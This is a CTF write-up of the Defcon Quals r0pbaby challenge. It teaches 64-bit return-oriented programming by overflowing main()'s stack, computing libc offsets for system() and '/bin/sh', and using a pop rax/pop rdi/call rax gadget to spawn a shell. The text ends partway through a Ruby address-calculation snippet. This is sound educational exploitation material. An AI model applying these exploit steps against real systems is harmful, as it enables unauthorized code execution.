Defcon Quals: r0pbaby (simple 64-bit ROP)

This past weekend I competed in the Defcon CTF Qualifiers from the Legit Business Syndicate. In the past it’s been one of my favourite competitions, and this year was no exception!

Unfortunately, I got stuck for quite a long time on a 2-point problem (“wwtw”) and spent most of my weekend on it. But I did do a few others - r0pbaby included - and am excited to write about them, as well!

r0pbaby is neat, because it’s an absolute bare-bones ROP (return-oriented programming) level. Quite honestly, when it makes sense, I actually prefer using a ROP chain to using shellcode. Much of the time, it’s actually easier! You can see the binary, my solution, and other stuff I used on this github repo.

It might make sense to read a post I made in 2013 about a level in PlaidCTF called ropasaurusrex. But it’s not really necessary - I’m going to explain the same stuff again with two years more experience!

What is ROP?

Most modern systems have DEP - data execution prevention - enabled. That means that when trying to run arbitrary code, the code has to be in memory that’s executable. Typically, when a process is running, all memory segments are either writable (+w) or executable (+x) - not both. That’s sometimes called “W^X”, but it seems more appropriate to just call it common sense.

ROP - return-oriented programming - is an exploitation technique that bypasses DEP. It does that by chaining together legitimate code that’s already in executable memory. This requires the attacker to either a) have complete control of the stack, or b) have control of rip/eip (the instruction pointer register) and the ability to change esp/rsp (the stack pointer) to point to another buffer.

As a quick example, let’s say you overwrite the return address of a vulnerable function with the address of libc’s sleep() function. When the vulnerable function attempts to return, instead of returning to where it’s supposed to (or returning to shellcode), it’ll return to the first line of sleep().

On a 32-bit system, sleep() will look at the next-to-next value on the stack to find out how long to sleep(). On a 64-bit system, it’ll look at the value of the rdi register for its argument, which is a little more elaborate to set up. When it’s done, it’ll return to the next value on the stack on both architectures, which could very well be another function.

So basically, sleep() expects its stack to look like this on 32-bit:

+----------------------+
|...higher addresses...|
+----------------------+
|         1000         | <-- sleep() looks here for its param (on 32-bit)
+----------------------+
|     [return addr]    | <-- where esp will be when sleep() is entered
+----------------------+
|    [sleep's  addr]   | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+

And on 64-bit:

+----------------------+
|...higher addresses...|
+----------------------+ <-- sleep()'s param is in rdi, so it's not needed here
|     [return addr]    | <-- where rsp will be when sleep() is entered
+----------------------+
|    [sleep's  addr]   | <-- return addr of previous function
+----------------------+
|...lower addresses....| <-- other data from previous function
+----------------------+
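
To make the two layouts concrete, here’s a rough Python sketch that packs the bytes an attacker would place starting at the overwritten return address. The addresses are made up for illustration (they aren’t from any real binary), and the 64-bit version assumes rdi already holds the argument, which is the part that takes extra work.

```python
import struct

# Hypothetical addresses, purely for illustration.
SLEEP_ADDR_32 = 0x08048400
NEXT_ADDR_32 = 0x08048500
SLEEP_ADDR_64 = 0x00007FFFF7900000
NEXT_ADDR_64 = 0x00007FFFF7900100

def chain_32(seconds):
    # Lowest address first: sleep()'s address (overwrites the saved return
    # address), then where sleep() should return to, then its parameter.
    return struct.pack("<III", SLEEP_ADDR_32, NEXT_ADDR_32, seconds)

def chain_64():
    # No parameter on the stack: sleep() reads it from rdi instead.
    return struct.pack("<QQ", SLEEP_ADDR_64, NEXT_ADDR_64)

print(chain_32(1000).hex())
print(chain_64().hex())
```

Note that the 32-bit chain is three 4-byte slots while the 64-bit chain is two 8-byte slots; the parameter simply isn’t there.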

We’ll dive into deeper detail of how to set this up and see way more stack diagrams shortly. But let’s start from the beginning!

Taking a first look

When you run r0pbaby, or connect to their service, you will see a prompt (the program uses stdin/stdout for i/o):

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:

It’s worthwhile messing with the options a bit to get a feel for it:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: printf
Symbol printf: 0x00007FFFF7892F10
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): hello???
Invalid amount.
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
:

We’ll look at option 3 more in a little while, but for now let’s take a quick look at options 1 and 2. The rest of this section isn’t directly applicable to the exploitation stuff, so you’re free to skip it if you want. :)

If you look at the results from option 1 and option 2, you’ll see one strange thing: the return from “Get libc address” is higher than the addresses of printf() and system(). It also isn’t page aligned (a multiple of 0x1000 (4096), usually), so it almost certainly isn’t actually the base address (which, in fairness, the level doesn’t explicitly say it is).

I messed around a bit out of curiosity. Here’s what I discovered…

First, run the program in gdb and get the address that they claim is libc:

$ gdb -q ./r0pbaby
Reading symbols from ./r0pbaby...(no debugging symbols found)...done.
(gdb) run
Starting program: /home/ron/defcon-quals/r0pbaby/r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 1
libc.so.6: 0x00007FFFF7FF8B28
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit

So that’s what it returns: 0x00007FFFF7FF8B28. Now we use ctrl-c to break into the debugger and figure out the real base address:

: ^C
Program received signal SIGINT, Interrupt.
0x00007ffff791e5e0 in __read_nocancel () from /lib64/libc.so.6
(gdb) info proc map
process 5475
Mapped address spaces:

          Start Addr           End Addr       Size     Offset objfile
      0x555555554000     0x555555556000     0x2000        0x0 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555755000     0x555555757000     0x2000     0x1000 /home/ron/defcon-quals/r0pbaby/r0pbaby
      0x555555757000     0x555555778000    0x21000        0x0 [heap]
      0x7ffff7842000     0x7ffff79cf000   0x18d000        0x0 /lib64/libc-2.20.so
      0x7ffff79cf000     0x7ffff7bce000   0x1ff000   0x18d000 /lib64/libc-2.20.so
      0x7ffff7bce000     0x7ffff7bd2000     0x4000   0x18c000 /lib64/libc-2.20.so
      0x7ffff7bd2000     0x7ffff7bd4000     0x2000   0x190000 /lib64/libc-2.20.so
[...]

This tells us that the actual address where libc is loaded is 0x7ffff7842000. Theirs was definitely wrong!

On a Linux system, the first 4 bytes at the base address will usually be “\x7fELF” or “\x7f\x45\x4c\x46”. We can check the first four bytes at the actual base address to verify:

(gdb) x/8xb 0x7ffff7842000
0x7ffff7842000: 0x7f    0x45    0x4c    0x46    0x02    0x01    0x01    0x00
(gdb) x/8xc 0x7ffff7842000
0x7ffff7842000: 127 '\177'      69 'E'  76 'L'  70 'F'  2 '\002'        1 '\001'        1 '\001'        0 '\000'

And we can check the base address that the program tells us:

(gdb) x/8xb 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00    0x20    0x84    0xf7    0xff    0x7f    0x00    0x00

From experience, that looks like a 64-bit address to me (6 bytes long, starts with 0x7f if you read it in little endian), so I tried printing it as a 64-bit value:

(gdb) x/xg 0x00007FFFF7FF8B28
0x7ffff7ff8b28: 0x00007ffff7842000

Aha! It’s a pointer to the actual base address! It seems a little odd to send that to the user, since it does them basically no good, so I’ll assume that it’s a bug. :)
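
The same check can be done outside of gdb. As a small sketch, this Python snippet takes the eight bytes gdb printed at 0x7ffff7ff8b28, decodes them as a little-endian 64-bit value, and compares page alignment of the decoded value against the address the program reported.

```python
import struct

PAGE_SIZE = 0x1000

# The eight bytes gdb showed at the address the program reported.
raw = bytes([0x00, 0x20, 0x84, 0xF7, 0xFF, 0x7F, 0x00, 0x00])
reported = 0x00007FFFF7FF8B28

# "<Q" means little-endian, unsigned 64-bit.
(pointed_to,) = struct.unpack("<Q", raw)

print(hex(pointed_to))
print("pointed-to value page aligned:", pointed_to % PAGE_SIZE == 0)
print("reported value page aligned:", reported % PAGE_SIZE == 0)
```

The decoded value matches the start of the libc mapping from “info proc map”, and only the decoded value is a multiple of the page size.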

Stealing libc

If there’s one thing I hate, it’s attacking a level blind. Based on the output so far, it’s pretty clear that they’re going to want us to call a libc function, but they don’t actually give us a copy of libc.so! While it’s not strictly necessary, having a copy of libc.so makes this far easier.

I’ll post more details about how and why to steal libc in a future post, but for now, suffice it to say: if you can, beat the easiest 64-bit level first (like babycmd) and liberate a copy of libc.so. Also snag a 32-bit version of libc if you can find one. Believe me, you’ll be thankful for it later! To make it possible to follow the rest of this post, here’s libc-2.19.so from babycmd and here’s libc-2.20.so from my box, which is the one I’ll use for this writeup.

You might be wondering how to verify whether or not that actually IS the right library. For now, let’s consider that to be homework. I’ll be writing more about that in the future, I promise!

Find a crash

I played around with option 3 for a while, but it kept giving me a length error. So I used the best approach for annoying CTF problems: I asked a teammate who’d already solved that problem. He’d reverse engineered the function already, saving me the trouble. :)

It turns out that the correct way to format things is by sending a length, then a newline, then the payload:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 3
Enter bytes to send (max 1024): 20
AAAAAAAAAAAAAAAAAAAA
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.
Segmentation fault

Well, that may be one of the easiest ways I’ve gotten a segfault! But the work isn’t quite done. :)

rip control

Our first goal is going to be to get control of rip (that’s like eip, the instruction pointer, but on a 64-bit system). As you probably know by now, rip is the register that points to the current instruction being executed. If we move it, different code runs. The classic attack is to move eip to point at shellcode, but ROP is different. We want to carefully control rip to make sure it winds up in all the right places.

But first, let’s non-carefully control it!

The program indicates that it’s writing the r0p buffer to the stack, so the easiest thing to do is probably to start throwing stuff into the buffer to see what happens. I like to send a string with a series of values I’ll recognize in a debugger. Since it’s a 64-bit app, I send 8 “A”s, 8 “B”s, and so on. If it doesn’t crash, I send more.

$ gdb -q ./r0pbaby
(gdb) run

[...]

: 3
Enter bytes to send (max 1024): 32
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: Bad choice.

Program received signal SIGSEGV, Segmentation fault.
0x0000555555554eb3 in ?? ()

All right, it crashes at 0x0000555555554eb3. Let’s take a look at what lives at the current instruction (pro-tip: “x/i $rip” or equivalent is basically always the first thing I run on any crash I’m investigating):

(gdb) x/i $rip
=> 0x555555554eb3:      ret

It’s crashing while attempting to return! That generally only happens when either the stack pointer is messed up…

(gdb) print/x $rsp
$1 = 0x7fffffffd918

…which it doesn’t appear to be, or when it’s trying to return to a bad address…

(gdb) x/xg $rsp
0x7fffffffd918: 0x4242424242424242

…which it is! It’s trying to return to 0x4242424242424242 (“BBBBBBBB”), which is an illegal address (in a user-space address on x86-64, the top two bytes have to be zero).

We can confirm this, and also prove to ourselves that NUL bytes are allowed in the input, by sending a couple of NUL bytes. I’m switching to using ‘echo’ on the command line now, so I can easily add NUL bytes (keep in mind that because of little endian, the NUL bytes have to go after the “B”s, not before):

$ ulimit -c unlimited
$ echo -ne '3\n32\nAAAAAAAABBBBBB\0\0CCCCCCCCDDDDDDDD\n' | ./r0pbaby
[...]
Segmentation fault (core dumped)
$ gdb ./r0pbaby ./core
[...]
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x0000424242424242 in ?? ()

Now we can see that rip was successfully set to 0x0000424242424242 (“BBBBBB\0\0” because of little endian)!
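
If you’d rather not hand-assemble those echo strings, the input can be generated. Here’s a rough Python sketch that assumes the format seen in the echo command above (menu choice, length, and payload, each followed by a newline); the helper names pattern() and option3() are made up for this example.

```python
import struct

def pattern(count):
    # 8 "A"s, then 8 "B"s, and so on: one letter per 64-bit stack slot.
    return b"".join(bytes([ord("A") + i]) * 8 for i in range(count))

def option3(payload):
    # Menu choice 3, then the payload length, then the payload itself.
    return b"3\n" + str(len(payload)).encode() + b"\n" + payload + b"\n"

# Replace the second slot (the return address) with a value whose top
# two bytes are NUL. Little endian puts those NUL bytes last.
payload = bytearray(pattern(4))
payload[8:16] = struct.pack("<Q", 0x0000424242424242)

print(option3(bytes(payload)))
```

Piping that output into ./r0pbaby should be equivalent to the echo command, since struct.pack("<Q", ...) emits the six “B”s first and the two NUL bytes after them.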

How's the stack work again?

As I said at the start, reading my post about ropasaurusrex would be a good way to get acquainted with ROP exploits. If you’re pretty comfortable with stacks or you’ve recently read/understood that post, feel free to skip this section!

Let’s start by talking about 32-bit systems - where parameters are passed on the stack instead of in registers. I’ll explain how to deal with register parameters in 64-bit below.

Okay, so: a program’s stack is a run-time structure that holds temporary values that functions need. Things like the parameters, the local variables, the return address, and other stuff. When a function is called, it allocates itself some space on the stack by growing downward (towards lower memory addresses). When the function returns, the data’s all removed from the stack (it’s not actually wiped from memory, it just becomes free to get overwritten). The register rsp always points to the most recent thing pushed to the stack and the next thing that would be popped off the stack.

Let’s use sleep() as an example again. You call sleep() like this:

1: push 1000
2: call sleep

or like this:

1: mov [esp], 1000
2: call sleep

They’re identical, as far as sleep() is concerned. The first is a tiny bit more memory efficient and the second is a tiny bit faster, but that’s about it.

Before line 1, we don’t know or care what’s on the stack. We can look at it like this (I’m choosing completely arbitrary addresses so you can match up diagrams with each other):

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1040 |     (irrelevant)     |
       +----------------------+
0x103c |     (irrelevant)     |
       +----------------------+
0x1038 |     (irrelevant)     | <-- rsp
       +----------------------+
0x1034 |       (unused)       |
       +----------------------+
0x1030 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Values lower than rsp are unused. That means that as far as the stack’s concerned, they’re unallocated. They might be zero, or they might contain values from previous function calls. In a properly working system, they’re never read. If they’re accidentally used (like if somebody declares a variable but forgets to initialize it), you could wind up with a use-after-free vulnerability or similar.

The value that rsp is pointing to and the values above it (at higher addresses) also don’t really matter. They’re part of the stack frame for the function that’s calling sleep(), and sleep() doesn’t care about those. It only cares about its own stack frame (a stack frame, as we’ll see, is the parameters, return address, saved registers, and local variables of a function - basically, everything the function stores on the stack and everything it cares about on the stack).

Line 1 pushes 1000 onto the stack. The frame will then look like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x103c |     (irrelevant)     |
       +----------------------+
0x1038 |     (irrelevant)     | <-- stuff from the previous function
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         | <-- rsp
       +----------------------+
0x1030 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

When you call the function at line 2, it pushes the return address onto the stack, like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    | <-- rsp
       +----------------------+
0x102c |       (unused)       |
       +----------------------+
0x1028 |       (unused)       |
       +----------------------+
0x1024 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Note how rsp has moved from 0x1038 to 0x1034 to 0x1030 as stuff is added to the stack. But it always points to the last thing added!
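
If it helps to see that movement as code, here’s a toy Python model of the two instructions. It’s only a sketch: it assumes 4-byte slots like the diagrams above, and the Stack32 class is invented for this example rather than anything a real debugger or library provides.

```python
class Stack32:
    """Toy model of a 32-bit stack: a dict of slots plus a stack pointer."""

    def __init__(self, sp):
        self.sp = sp
        self.slots = {}

    def push(self, value):
        # The stack grows downward, so a push subtracts from sp first.
        self.sp -= 4
        self.slots[self.sp] = value

    def call(self, return_addr):
        # A call pushes the return address and then jumps; only the
        # push is modelled here.
        self.push(return_addr)

stack = Stack32(sp=0x1038)
trace = [stack.sp]
stack.push(1000)              # line 1: push 1000
trace.append(stack.sp)
stack.call("[return addr]")   # line 2: call sleep
trace.append(stack.sp)

print([hex(sp) for sp in trace])
```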

Let’s look at how sleep() might be implemented. This is a very common function prelude:

100: sleep():
101: push rbp
102: mov rbp, rsp
103: sub rsp, 0x20
104: …everything else…

(Note that those are line numbers for reference, not actual addresses, so please don’t get upset that the values don’t increment enough :) )

At line 101, the old frame pointer is saved to the stack:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    | <-- rsp
       +----------------------+
0x1028 |       (unused)       |
       +----------------------+
0x1024 |       (unused)       |
       +----------------------+
0x1020 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

Then at line 102, nothing on the stack changes. On line 103, 0x20 is subtracted from rsp, which effectively reserves 0x20 (32) bytes for local variables:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     | <-- rsp
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+
0x1004 |       (unused)       |
       +----------------------+
0x1000 |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

And that’s the entire stack frame for the sleep() function call! It’s possible that there are other registers preserved on the stack, in addition to rbp, but that doesn’t really change anything. We only care about the parameters and the return address.

If sleep() calls a function, the same process will happen:

       +----------------------+
       |...higher addresses...|
       +----------------------+
0x1038 |     (irrelevant)     |
       +----------------------+
       +----------------------+ <-- start of sleep()'s stack frame
0x1034 |         1000         |
       +----------------------+
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     |
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+ <-- start of next function's stack frame
0x1004 |       [params]       |
       +----------------------+
0x1000 |     [return addr]    |
       +----------------------+
0x0ffc |     [saved frame]    |
       +----------------------+
       |                      |
0x0ff8 |                      |
   -   |     [local vars]     |
0x0fb4 |                      |
       |                      |
       +----------------------+ <-- end of next function's stack frame
       +----------------------+
0x0fb0 |       (unused)       |
       +----------------------+
0x0fac |       (unused)       |
       +----------------------+
       |...lower addresses....|
       +----------------------+

And so on, with the stack constantly growing towards lower addresses. When the function returns, the same thing happens in reverse order (the local vars are removed from the stack by adding to rsp (or replacing it with rbp), rbp is popped off the stack, and the return address is popped and returned to).

The parameters are cleared off the stack by either the caller or callee, depending on the compiler, but that won’t come into play for this writeup. However, when ROP is used to call multiple functions, unless the functions clean up their own parameters off the stack, the exploit developer has to do it themselves. Typically, on Windows, functions clean up after themselves but on other OSes they don’t (but you can’t rely on that). This is done by using a “pop ret”, “pop pop ret”, etc., after each function call. See my ropasaurusrex writeup for more details.

Enter: 64-bit

The fact that this level is 64-bit complicates things in important ways (and ways that I always seem to forget about till things don’t work).

Specifically, in 64-bit, the first handful of parameters to a function are passed in registers, not on the stack. I don’t have the order of registers memorized - I forget it after every CTF, along with whether ja/jb or jl/jg are the unsigned ones - but the first two are rdi and rsi. That means that to call the same sleep() function on 64-bit, we’d have this code instead:

1: mov rdi, 1000
2: call sleep

And its stack frame would look like this:

       +----------------------+
       |...higher addresses...|
       +----------------------+ <-- start of previous function's stack frame
       +----------------------+ <-- start of sleep()'s stack frame
0x1030 |     [return addr]    |
       +----------------------+
0x102c |     [saved frame]    |
       +----------------------+
       |                      |
0x1028 |                      |
   -   |     [local vars]     |
0x1008 |                      |
       |                      |
       +----------------------+ <-- end of sleep()'s stack frame
       +----------------------+
       |...lower addresses....|
       +----------------------+

No parameters, just the return address, saved frame pointer, and local variables. On 64-bit, the stack is only used for parameters when a function takes more than the handful that fit in registers, which is rare.

Stacks: the important bit

Okay, so that’s a stack frame. A stack frame contains parameters, return address, saved registers, and local variables. On 64-bit, it usually contains the return address, saved registers, and local variables (no parameters).

But here’s the thing: when you enter a function - that is to say, when you start running the first line of the function - the function doesn’t really know where you came from. I mean, not really. It knows the return address that’s on the stack, but doesn’t really have a way to validate that it’s real (except with advanced exploitation mitigations). It also knows that there are some parameters right before (at higher addresses than) the return address, if it’s 32-bit. Or that rdi/rsi/etc. contain parameters if it’s 64-bit.

So let’s say you overwrote the return address on the stack and returned to the first line of sleep(). What’s it going to do?

As we saw, on 64-bit, sleep() expects its stack frame to contain a return address:

+----------------------+
|...higher addresses...|
+----------------------+
+----------------------+ <-- start of sleep()'s stack frame
|     [return addr]    | <-- rsp
+----------------------+
|     (unallocated)    |
+----------------------+
|...lower addresses....|
+----------------------+

sleep() will push some registers, make room for local variables, and really just do its own thing. When it’s all done, it’ll grab the return address from the stack, return to it, and somebody will move rsp back to the calling function’s stack frame (i.e., getting rid of any parameters from the stack).

Using system()

Because this level uses stdout and stdin for i/o, all we really have to do is make this call:

system("/bin/sh")

Then we can run arbitrary commands. Seems pretty simple, eh? We don’t even care where system() returns to; once it’s done, the program can just crash!

You just have to do two things:

set rip to the address of system()
set rdi to a pointer to the string "/bin/sh" (or just "sh" if you prefer)

Setting rip to the address of system() is easy. We have the address of system() and we have rip control, as we discovered. It’s just a matter of grabbing the address of system() and using that in the overflow.

Setting rdi to the pointer to “/bin/sh” is a little more problematic, though. First, we need to find the address of “/bin/sh” somehow. Then we need a “gadget” to put it in rdi. A “gadget”, in ROP, refers to a small piece of code that performs an operation then returns.

It turns out, all of the above can be easily done by using a copy of libc.so. Remember how I told you it’d come in handy?

Finding "/bin/sh"

So, this is actually pretty easy. We need to find “/bin/sh” given a) the ability to leak an address in libc.so (which this program does by design), and b) a copy of libc.so. Even with ASLR turned on, any two addresses within the same binary (like within libc.so or within the binary itself) won’t change their relative positions to each other. Addresses in two different binaries will likely be different, though.

If you fire up IDA, and go to the “strings” tab (shift-F12), you can search for “/bin/sh”. You’ll see that “/bin/sh” will have an address something like 0x7ffff6aa307c.

Alternatively, you can use this gdb command (helpfully supplied by bla from io.sts):

(gdb) find /b 0x7ffff7842000,0x7ffff7bd4000, '/','b','i','n','/','s','h'
0x7ffff79a307c
warning: Unable to access 16000 bytes of target memory at 0x7ffff79d5d03, halting search.
1 pattern found.
(gdb) x/s 0x7ffff79a307c
0x7ffff79a307c: "/bin/sh"

Once you’ve obtained the address of “/bin/sh”, find the address of any libc function - we’ll use system(), since system() will come in handy later. The address will be something like 0x00007ffff6983960. If you subtract the two addresses, you’ll discover that the address of “/bin/sh” is 0x11f71c bytes after the address of system(). As I said earlier, that won’t change, so we can reliably use that in our exploit.

Now when you run the program:

$ ./r0pbaby

Welcome to an easy Return Oriented Programming challenge...
Menu:
1) Get libc address
2) Get address of a libc function
3) Nom nom r0p buffer to stack
4) Exit
: 2
Enter symbol: system
Symbol system: 0x00007FFFF7883960

You can easily calculate that the address of the string “/bin/sh” will be at 0x00007ffff7883960 + 0x11f71c = 0x7ffff79a307c.
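
That arithmetic is simple enough to script. Here’s a minimal Python sketch that derives the offset from the two addresses seen in the debugger session and applies it to a leaked system() address. The second leak value is made up, just to show the offset carrying over when libc loads somewhere else, and the offset itself only holds for this particular libc build.

```python
# Addresses from the libc in the debugger session above.
SYSTEM_IN_LIBC = 0x00007FFFF7883960
BINSH_IN_LIBC = 0x00007FFFF79A307C

# The distance between the two doesn't change, even under ASLR.
BINSH_OFFSET = BINSH_IN_LIBC - SYSTEM_IN_LIBC

def binsh_from_system(leaked_system):
    # Apply the fixed offset to whatever address the program leaks.
    return leaked_system + BINSH_OFFSET

print(hex(BINSH_OFFSET))
print(hex(binsh_from_system(SYSTEM_IN_LIBC)))
# A made-up leak, as if libc had been loaded at a different base.
print(hex(binsh_from_system(0x00007F1234583960)))
```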

Getting "/bin/sh" into rdi

The next thing you’ll want to do is put the address of “/bin/sh” into rdi. We can do that in two steps (recall that we have control of the stack - it’s the point of the level):

Put it on the stack
Find a "pop rdi" gadget

To do this, I literally searched for “pop rdi” in IDA. With the spaces and everything! :)

I found this in both my own copy of libc and the one I stole from babycmd:

.text:00007FFFF80E1DF1                 pop     rax
.text:00007FFFF80E1DF2                 pop     rdi
.text:00007FFFF80E1DF3                 call    rax

What a beautiful sequence! It pops the next value off the stack into rax, pops the next value into rdi, and calls rax. So it calls an address from the stack with a parameter read from the stack. It’s such a lovely gadget! I was surprised and excited to find it, though I’m sure every other CTF team already knew about it. :)

The absolute address that IDA gives us is 0x00007ffff80e1df1, but just like the “/bin/sh” string, the address relative to the rest of the binary never changes. If you subtract the address of system() from that address, you’ll get 0xa7969 (on my copy of libc).

Let’s look at an example of what’s actually going on when we call that gadget. You’re at the end of main() and getting ready to return. rsp is pointing to what it thinks is the return address, but is really “BBBBBBBB”-now-gadget_addr:

+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|  0x00007ffff80e1df1  | <-- rsp
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+

When the return happens, it looks like this:

+----------------------+
|...higher addresses...|
+----------------------+
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       | <-- rsp
+----------------------+
|  0x00007FFFF80E1DF1  |
+----------------------+
|       AAAAAAAA       |
+----------------------+
|...lower addresses....|
+----------------------+

The first instruction - pop rax - runs. rax is now 0x4343434343434343 (“CCCCCCCC”).

The second instruction - pop rdi - runs. rdi is now 0x4444444444444444 (“DDDDDDDD”).

Then the final instruction - call rax - runs. It’ll attempt to call 0x4343434343434343, with 0x4444444444444444 as its parameter, and crash. Controlling both the called address and the parameter is a huge win!
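
Those steps can be traced with a tiny simulation. This Python sketch doesn’t execute anything real; it just walks a list of 64-bit values the way ret, pop rax, pop rdi, and call rax would consume them. The run_gadget() helper is invented for this example.

```python
def run_gadget(stack_words):
    """Simulate a ret into the gadget, then pop rax / pop rdi / call rax.

    stack_words lists 64-bit values starting at the slot rsp points to
    when main() executes its ret, lowest address first.
    """
    words = list(stack_words)
    rip = words.pop(0)   # ret: pops the gadget's address into rip
    rax = words.pop(0)   # pop rax
    rdi = words.pop(0)   # pop rdi
    # call rax: control goes to rax, with rdi as the first parameter.
    return {"gadget": rip, "called": rax, "param": rdi}

GADGET_ADDR = 0x00007FFFF80E1DF1  # the address IDA displayed
result = run_gadget([GADGET_ADDR, 0x4343434343434343, 0x4444444444444444])
print({name: hex(value) for name, value in result.items()})
```

Swapping the “C” slot for the address of system() and the “D” slot for the address of “/bin/sh” is all that separates this crash from a shell.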

Putting it all together

I realize this is a lot to take in if you can’t read stacks backwards and forwards (trust me, I frequently read stacks backwards - in fact, I wrote this entire blog post with upside-down stacks before I noticed and had to go back and fix it! :) ).

Here’s what we have:

The ability to write up to 1024 bytes onto the stack
The ability to get the address of system()
The ability to get the address of "/bin/sh", based on the address of system()
The ability to get the address of a sexy gadget, also based on system(), that'll call something from the stack with a parameter from the stack

We’re overflowing a local variable in main(). Immediately before our overflow, this is what main()’s stack frame probably looks like:

+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|         argv         |
+----------------------+
|         argc         |
+----------------------+
|     [return addr]    | <-- return address of main()
+----------------------+
|     [saved frame]    | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     | <-- rsp
|                      |
|                      |
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

Because you only get 8 bytes before you hit the return address, the first 8 bytes are probably overwriting the saved frame pointer (or whatever, it doesn’t really matter, but you can prove it’s the frame pointer by using a debugger and verifying that rbp is 0x4141414141414141 after it returns (it is)).

The main thing is, as we saw earlier, if you send the string “AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD”, the “BBBBBBBB” winds up as main()’s return address. That means the stack winds up looking like this before main() starts cleaning up its stack frame:

+----------------------+
|...higher addresses...|
+----------------------+ <-- WAS the start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|       BBBBBBBB       | <-- return address of main()
+----------------------+
|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

When main attempts to return, it tries to return to 0x4242424242424242 as we saw earlier, and it crashes.

Now, one thing we could do is return directly to system(). Your guess is as good as mine as to what’s in rdi at that point, but you can bet it’s not going to be a pointer to “/bin/sh”. So instead, we return to our gadget:

+----------------------+
|...higher addresses...|
+----------------------+ <-- start of main()'s stack frame
|       DDDDDDDD       |
+----------------------+
|       CCCCCCCC       |
+----------------------+
|     gadget_addr      | <-- return address of main()
+----------------------+
|       AAAAAAAA       | <-- overflowable variable must start here
+----------------------+
|                      |
|                      |
|     [local vars]     |
|                      |
|                      | <-- rsp
+----------------------+ <-- end of main()'s stack frame
|...lower addresses....|
+----------------------+

Since I have ASLR off on my computer (if you do turn it off, please make sure you turn it back on!), I can pre-compute the addresses I need.

Symbol system: 0x00007FFFF7883960 (from the program)

sh_addr = system_addr + 0x11f71c
sh_addr = 0x00007ffff7883960 + 0x11f71c
sh_addr = 0x7ffff79a307c

gadget_addr = system_addr + 0xa7969
gadget_addr = 0x00007ffff7883960 + 0xa7969
gadget_addr = 0x7ffff792b2c9
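If you’d rather not do the hex arithmetic by hand, here’s a minimal Ruby sketch of the same calculation. It uses the addresses and offsets from my machine (yours will differ), and echo_escape is just a hypothetical helper I made up to print each address as the little-endian escape sequence that echo -e expects:

```ruby
# Values from the walkthrough above (ASLR off, my libc; yours will differ)
SYSTEM_ADDR   = 0x00007ffff7883960
SH_OFFSET     = 0x11f71c  # address of "/bin/sh" minus address of system()
GADGET_OFFSET = 0xa7969   # address of the gadget minus address of system()

sh_addr     = SYSTEM_ADDR + SH_OFFSET
gadget_addr = SYSTEM_ADDR + GADGET_OFFSET

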